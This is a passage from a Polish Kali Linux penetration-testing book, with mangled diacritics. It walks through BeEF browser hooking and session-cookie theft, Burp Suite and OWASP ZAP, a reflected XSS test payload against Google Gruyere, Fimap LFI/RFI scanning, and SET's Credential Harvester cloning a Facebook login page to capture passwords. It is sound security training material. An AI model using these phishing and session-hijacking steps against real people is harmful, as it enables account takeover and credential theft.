Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

